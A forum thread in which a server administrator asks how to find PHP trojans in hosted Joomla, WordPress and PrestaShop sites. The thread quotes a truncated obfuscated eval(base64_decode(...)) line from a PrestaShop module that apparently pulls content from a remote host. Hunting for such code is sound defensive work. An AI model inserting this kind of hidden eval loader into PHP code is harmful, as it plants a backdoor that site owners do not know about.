Finding Exploits and Trojan php hacks

  • anyone knows how to perform a search to find exploits and trojan php hacks in /var/www/virtual/*
    I had many bruteforce attacks on joomla and WP sites and this server produces high load, so I'll need to check the webs

  • thank you, are all this files infected and should be removed?
    I have found this in a prestashop module:

    Code
    1. // Il est strictement interdit d'enlever ceci sous peine de poursuite pour la version gratuite.
    2. eval(base64_decode('CQkkdXJsID0gJ2h0dHA6Ly9yc3MuZGRseC5vcmcvc2l0ZXMueG1sJzsNCgkJJGNvbnRlbnQgPSAnJzsNCgkJJGNvbnRlbnUg$
    3. return $this->display(__FILE__, 'ddlx_xtreme_footer.tpl');
    4. }